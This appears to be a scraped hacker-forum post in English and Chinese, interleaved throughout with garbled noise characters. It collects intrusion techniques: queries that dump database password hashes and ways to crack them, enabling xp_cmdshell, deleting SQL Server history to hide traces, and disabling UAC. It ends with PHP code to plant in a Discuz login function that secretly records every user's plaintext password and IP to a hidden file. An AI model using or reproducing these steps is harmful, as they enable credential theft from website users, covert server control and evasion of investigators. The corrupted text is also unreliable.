+ i2 |( M4 }- ?1 v# L% M# Z1.sql server2000/ w/ s* N+ q* G. X$ {1 Z
SELECT password from master.dbo.sysxlogins where name='sa'7 U# U0 r7 Z% d) L( q7 C
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341" O q. A3 P" N* }
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A, T$ n: U* k7 ?8 R* n
4 P2 ~' s& c7 Y
0×0100- constant header
6 N. M4 }# A0 h0 ^34767D5C- salt
: H2 w1 c1 s \2 l6 k: {0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
1 ]7 V7 R9 y1 R% o. z _: C2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash( e' u$ W( R1 [% [$ l3 z) X8 X
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
" G- B n, N, ?' D' R3 m; ^8 BSQL server 2005:-
" a) O/ a- O( H4 q9 L. N: |SELECT password_hash FROM sys.sql_logins where name='sa'1 {7 O+ A- h9 L; A6 b7 n+ A' I! Z
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F/ z8 b6 Q. ~' q, O$ G: e
0×0100- constant header0 G- N+ O6 w5 |) B' y9 N
993BF231-salt0 {. f7 ^, Z$ I$ j# K' \2 R; g
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash& `& l6 k7 T$ Y
crack case sensitive hash in cain, try brute force and dictionary based attacks.
& ~0 d2 c7 N& C
( T0 g1 [, |1 s4 O: Z- V/ Supdate:- following bernardo’s comments:-
1 v6 N, [0 S$ m8 Ruse function fn_varbintohexstr() to cast password in a hex string.
6 `$ L& t2 N, I5 k Be.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins- _- }7 ~5 ~: t6 a* A3 ?! B1 m
! x' b% J, g2 h- HMYSQL:-9 L, |* T9 H7 H2 ~% ^; {" K/ ?
# J; X, V# f) w$ d0 d6 v+ l! jIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.* K( L, m( j" \
& H+ {( |4 h5 j+ V6 V1 N*mysql < 4.13 g+ Y6 V( r, {% |# O
0 _0 R. U$ V8 B- O0 m# kmysql> SELECT PASSWORD(‘mypass’);: b* S5 s; b, ]
+——————–+
: f# Q& w) y( L% O1 M# S1 o| PASSWORD(‘mypass’) |
, d% A2 }+ j& h2 _( [+——————–+2 x# l+ K$ H6 k, q( U( \/ K
| 6f8c114b58f2ce9e |
8 P/ P9 q- x- O2 Z, g+——————–+
8 p) _! B V; J) X# `$ L
% h% U! c P5 I: [$ e*mysql >=4.11 S# [# S! Q% y4 g. i
* [; j8 U8 _6 l( [# U3 v" B8 i/ _
mysql> SELECT PASSWORD(‘mypass’);' C S% K8 T- h# u7 ^/ }0 `% j
+——————————————-+% K8 H4 T5 N9 E* E: J
| PASSWORD(‘mypass’) |
* L. t# T6 c4 s- I- Y2 ~+——————————————-+. I. _% L+ V, m8 l! p
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | ?; ^2 h) G" g1 ?5 E) \
+——————————————-+3 a. c l. ]1 o5 ?- ?& r; J/ @
. o* K# N6 e" b) z3 r+ ~
Select user, password from mysql.user& g: W8 Z6 s+ @% |
The hashes can be cracked in ‘cain and abel’
* ]% h9 k( w( D. ^. G( Y0 A; U, S* @2 P$ ~1 N
Postgres:-. O8 l+ y" @- O
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) ^' ]: Y( l1 {& d6 W! [2 O! R) s0 O! H
select usename, passwd from pg_shadow;) Q9 y1 v: I; z9 F) r+ t c
usename | passwd
8 f% Z4 u" b) W8 V0 L( g——————+————————————-3 Y) z0 g& D, R, x! _$ v
testuser | md5fabb6d7172aadfda4753bf0507ed43965 ^' {% W" B, z! l0 V* s
use mdcrack to crack these hashes:-
) O9 F: M) K4 E& ], h$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
9 j. V/ Q7 [7 B
/ ]6 @- c+ j s: L0 q# c$ MOracle:-
1 D/ A( r" F% P: x! @select name, password, spare4 from sys.user$6 R- x% K9 v: o4 y& \
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
9 M) E: x3 ~$ @. i( lMore on Oracle later, i am a bit bored….+ u& D9 c" y% m, t+ w3 d
4 }* ?- k7 O5 K+ n% s k
/ w8 h# Z0 u4 W: e7 [- B在sql server2005/2008中开启xp_cmdshell
# _3 m% z- @" v6 Y-- To allow advanced options to be changed.
: L' Z3 @5 K7 D! o9 q& J$ i9 B8 MEXEC sp_configure 'show advanced options', 1
! V) Y- e: w+ N5 {' X, L" A" LGO) `' J6 u4 k r" t6 y9 p: g
-- To update the currently configured value for advanced options.
j) V) m) R: W+ r1 [RECONFIGURE
6 L% @, w+ Q3 C2 B8 i. K( E; V* QGO
! u$ ]# Y: ?3 W) ~7 [2 p-- To enable the feature.4 w# U9 T- o- ` j7 u7 N( C
EXEC sp_configure 'xp_cmdshell', 10 Y/ q) W: K8 J& ~) ]
GO+ S: r, g( n0 o% _* s/ B# M8 j" N
-- To update the currently configured value for this feature. `# E: h; }! V3 y
RECONFIGURE
& `: g" U% }2 k: FGO
0 J9 A! r' {' ]0 qSQL 2008 server日志清除,在清楚前一定要备份。
: S/ Q5 Z5 c9 B G6 g# Z如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:% C) o1 b& W% I
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin* l0 \+ X0 H5 `( ~% I
4 C# Q0 y, A2 Z
对于SQL Server 2008以前的版本:% K. @( W* n7 {6 U- L
SQL Server 2005:
4 j4 X8 ]% l9 k% b0 a删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat% q2 e% ?) q$ e$ v) z3 t
SQL Server 2000:+ o$ i; u. ^4 P
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。, C; u/ p" e# B9 f1 g, I4 T7 {
6 m0 \0 m1 p0 }# S( U) H! V本帖最后由 simeon 于 2013-1-3 09:51 编辑
* ^* H' S6 ]" u4 E' h' U8 @: H6 h `: P& G; N
( ^, S# l1 S( R+ N' e7 twindows 2008 文件权限修改
( y `+ B7 q5 d1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
7 H; @$ D- L$ |- \7 L2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
( j6 j2 u0 y$ A0 z一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
5 T) w! K9 J' o$ b; m' C
8 ^7 R6 b" T1 ?Windows Registry Editor Version 5.00; Q3 q8 @" U! ^8 J) A
[HKEY_CLASSES_ROOT\*\shell\runas]
4 j" ^. j- I& J0 P+ {; j# h@="管理员取得所有权"' w' |1 P2 J0 Q. O& _9 ]
"NoWorkingDirectory"=""" P2 Y$ l1 z% m/ }2 I
[HKEY_CLASSES_ROOT\*\shell\runas\command]
1 l5 B% B" ?' i! V/ j g" |& r* S- a@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 ]- _+ p$ J. v. s/ s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 [( Y5 O. w0 I" t[HKEY_CLASSES_ROOT\exefile\shell\runas2]
* W5 _+ D4 I, }@="管理员取得所有权"
% E! E$ ?" A v R& q"NoWorkingDirectory"=""
1 ?& C) C6 U/ b1 I/ \, n! s[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]' F$ W8 j0 X' M2 {$ b- C
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 ?, z E: ?2 Q1 U p"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" r, N. v+ D% o8 @2 w! W
# ?' M! G/ M# S2 D: k! u# d
[HKEY_CLASSES_ROOT\Directory\shell\runas]2 f7 m. g& ?* d, m" \ v
@="管理员取得所有权". U- s3 a1 @+ P+ o3 u
"NoWorkingDirectory"=""
& d$ w2 h( F" A9 H: I* _$ \[HKEY_CLASSES_ROOT\Directory\shell\runas\command]- D4 e1 K$ U/ f- z' w) i( {
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"9 B3 h' @# h; R/ c, I9 G% h
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
6 R! {0 f$ `/ |7 i$ _+ L7 u$ D2 h) u" j% y' m# Q
1 D9 Q n% M0 X- J; o
win7右键“管理员取得所有权”.reg导入' }1 i }9 u9 F: j5 H. O' K
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,& t! m6 d1 G3 \% v/ g
1、C:\Windows这个路径的“notepad.exe”不需要替换3 c4 x! ^7 D. g: h5 \- B# R, B
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换3 |. B0 g0 X6 v; G% q
3、四个“notepad.exe.mui”不要管
6 M C1 y. S" Q0 X. c. v* {4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和6 }8 f2 J" p0 R. V
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
& r5 e* f# _( b: U) s0 }# r替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,! |, F: ?% z4 q' {
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
/ c8 g. _+ M8 m1 f: `windows 2008中关闭安全策略:
% b7 _4 Q6 [4 T% Z$ @reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f- ?8 B: E, n6 B. d1 ?, Y
修改uc_client目录下的client.php 在
: @: q& f/ n5 Z, lfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
! g2 i& `# G$ h' m8 y下加入如上代码,在网站./data/cache/目录下自动生成csslog.php2 X. f, Z/ l! G7 w5 a
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) B& q' a0 B; g% _
if(getenv('HTTP_CLIENT_IP')) {5 v1 c* ^4 n2 {1 t: z! H
$onlineip = getenv('HTTP_CLIENT_IP');# R% \/ l6 y% {
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
, P& {1 I& t, W2 w. }# X) _$onlineip = getenv('HTTP_X_FORWARDED_FOR');
) J2 J2 c- _# X& s} elseif(getenv('REMOTE_ADDR')) {
7 }$ G5 m4 e" _! ^$onlineip = getenv('REMOTE_ADDR');
- u8 ~; q$ D5 ~) W- `1 t: x% B} else {- s# |' M+ S7 A R& Z* H3 ?
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
7 ~: T7 l6 Z5 |+ m1 m ?6 P}
i) `* @( d) [) h7 p u $showtime=date("Y-m-d H:i:s");
: h0 f; ^& I# b L N7 I. Y $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";$ v4 U9 W0 q6 ~ C; x
$handle=fopen('./data/cache/csslog.php','a+');- g" H- P' _, \
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对